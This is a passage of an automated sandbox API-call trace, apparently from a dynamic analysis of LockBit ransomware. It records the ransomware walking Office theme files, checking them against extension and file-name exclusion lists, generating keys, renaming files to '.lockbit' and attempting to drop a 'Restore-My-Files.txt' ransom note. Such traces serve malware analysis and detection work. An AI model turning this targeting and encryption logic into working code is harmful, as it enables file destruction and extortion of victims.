nFileSizeLow=0xdf9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Waveform.xml", cAlternateFileName="")) returned 0 [0196.160] FindClose (in: hFindFile=0x55fe38 | out: hFindFile=0x55fe38) returned 1 [0196.160] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x334aca00, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5c88fa0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x334aca00, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x2a23c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Trek.thmx", cAlternateFileName="TREK~1.THM")) returned 1 [0196.160] lstrcmpiW (lpString1=".", lpString2="Trek.thmx") returned -1 [0196.160] lstrcmpiW (lpString1="..", lpString2="Trek.thmx") returned -1 [0196.160] PathFindExtensionW (pszPath="Trek.thmx") returned=".thmx" [0196.161] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0196.161] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0196.162] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0196.162] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Trek.thmx") returned -1 [0196.162] lstrcmpiW (lpString1="ntldr", lpString2="Trek.thmx") returned -1 [0196.162] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Trek.thmx") returned -1 [0196.163] lstrcmpiW (lpString1="bootsect.bak", lpString2="Trek.thmx") returned -1 [0196.163] lstrcmpiW (lpString1="autorun.inf", lpString2="Trek.thmx") returned -1 [0196.163] lstrcmpiW (lpString1="thumbs.db", lpString2="Trek.thmx") returned -1 [0196.163] lstrcmpiW (lpString1="iconcache.db", lpString2="Trek.thmx") returned -1 [0196.163] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0196.163] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx") returned=".thmx" [0196.163] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0196.163] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0196.163] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0196.164] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0196.164] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0196.164] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0196.164] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0196.164] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0196.164] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0196.164] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0196.164] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0196.164] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0196.164] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx.lockbit") returned 71 [0196.164] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\trek.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0196.165] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.165] malloc (_Size=0x40068) returned 0x1ff1e60 [0196.165] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=172604) returned 1 [0196.165] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0196.166] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.166] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0196.167] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0196.170] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.170] malloc (_Size=0xa4) returned 0x1fa2ed8 [0196.170] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0196.171] free (_Block=0x1fa2ed8) [0196.171] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Trek.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0196.171] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0196.171] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.171] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36de5100, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x36de5100, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0xfc70, dwReserved0=0x0, dwReserved1=0x0, cFileName="Urban.thmx", cAlternateFileName="URBAN~1.THM")) returned 1 [0196.172] lstrcmpiW (lpString1=".", lpString2="Urban.thmx") returned -1 [0196.172] lstrcmpiW (lpString1="..", lpString2="Urban.thmx") returned -1 [0196.172] PathFindExtensionW (pszPath="Urban.thmx") returned=".thmx" [0196.172] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0196.172] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0196.173] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0196.173] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Urban.thmx") returned -1 [0196.174] lstrcmpiW (lpString1="ntldr", lpString2="Urban.thmx") returned -1 [0196.174] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Urban.thmx") returned -1 [0196.174] lstrcmpiW (lpString1="bootsect.bak", lpString2="Urban.thmx") returned -1 [0196.174] lstrcmpiW (lpString1="autorun.inf", lpString2="Urban.thmx") returned -1 [0196.174] lstrcmpiW (lpString1="thumbs.db", lpString2="Urban.thmx") returned -1 [0196.174] lstrcmpiW (lpString1="iconcache.db", lpString2="Urban.thmx") returned -1 [0196.174] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0196.174] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx") returned=".thmx" [0196.174] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0196.174] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0196.174] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".sdb", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".sdf", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".sql", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".sqlite", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".sqlite3", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".sqlitedb", lpString2=".thmx") returned -1 [0196.175] lstrcmpiW (lpString1=".tmd", lpString2=".thmx") returned 1 [0196.175] wsprintfW (in: param_1=0x3d6beb8, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx.lockbit") returned 72 [0196.175] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx" (normalized: "c:\\program files\\microsoft office\\document themes 14\\urban.thmx"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0196.177] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0196.177] malloc (_Size=0x40068) returned 0x3d70450 [0196.177] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=64624) returned 1 [0196.177] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.178] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0196.178] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0196.178] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0196.178] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0196.178] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0196.184] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx.lockbit", NtPathName=0x3d6c510, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0196.185] malloc (_Size=0xa6) returned 0x1fa2ed8 [0196.185] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6c2dc, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0196.185] free (_Block=0x1fa2ed8) [0196.185] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Urban.thmx" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14") returned 1 [0196.186] wsprintfW (in: param_1=0x3d6c0c8, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt") returned 74 [0196.186] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0196.186] FindNextFileW (in: hFindFile=0x55fdf8, lpFindFileData=0x3d6c970 | out: lpFindFileData=0x3d6c970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3a71d800, ftCreationTime.dwHighDateTime=0x1cbded9, ftLastAccessTime.dwLowDateTime=0xe5caf100, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x3a71d800, ftLastWriteTime.dwHighDateTime=0x1cbded9, nFileSizeHigh=0x0, nFileSizeLow=0x12600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Verve.thmx", cAlternateFileName="VERVE~1.THM")) returned 1 [0196.186] lstrcmpiW (lpString1=".", lpString2="Verve.thmx") returned -1 [0196.186] lstrcmpiW (lpString1="..", lpString2="Verve.thmx") returned -1 [0196.186] PathFindExtensionW (pszPath="Verve.thmx") returned=".thmx" [0196.186] lstrcmpiW (lpString1=".386", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".cmd", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".exe", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".ani", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".adv", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".theme", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".msi", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".msp", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".com", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".diagpkg", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".nls", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".diagcab", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".lock", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".ocx", lpString2=".thmx") returned -1 [0196.186] lstrcmpiW (lpString1=".mpa", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".cpl", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".mod", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".hta", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".icns", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".prf", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".rtp", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".diagcfg", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".msstyles", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".bin", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".shs", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".drv", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".wpx", lpString2=".thmx") returned 1 [0196.187] lstrcmpiW (lpString1=".bat", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".rom", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".msc", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".spl", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".ps1", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".msu", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".ics", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".key", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".mp3", lpString2=".thmx") returned -1 [0196.187] lstrcmpiW (lpString1=".reg", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".dll", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".ini", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".idx", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".sys", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".hlp", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".ico", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".lnk", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".rdp", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".lockbit", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Verve.thmx") returned -1 [0196.188] lstrcmpiW (lpString1="ntldr", lpString2="Verve.thmx") returned -1 [0196.188] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Verve.thmx") returned -1 [0196.188] lstrcmpiW (lpString1="bootsect.bak", lpString2="Verve.thmx") returned -1 [0196.188] lstrcmpiW (lpString1="autorun.inf", lpString2="Verve.thmx") returned -1 [0196.188] lstrcmpiW (lpString1="thumbs.db", lpString2="Verve.thmx") returned -1 [0196.188] lstrcmpiW (lpString1="iconcache.db", lpString2="Verve.thmx") returned -1 [0196.188] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\") returned="" [0196.188] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Verve.thmx") returned=".thmx" [0196.188] lstrcmpiW (lpString1=".rar", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".zip", lpString2=".thmx") returned 1 [0196.188] lstrcmpiW (lpString1=".7z", lpString2=".thmx") returned -1 [0196.188] lstrcmpiW (lpString1=".ckp", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".dacpac", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".db", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".db-shm", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".db-wal", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".db3", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".dbf", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".dbc", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".dbs", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".dbt", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".dbv", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".frm", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".mdf", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".mrg", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".mwb", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".myd", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".ndf", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW (lpString1=".qry", lpString2=".thmx") returned -1 [0196.189] lstrcmpiW 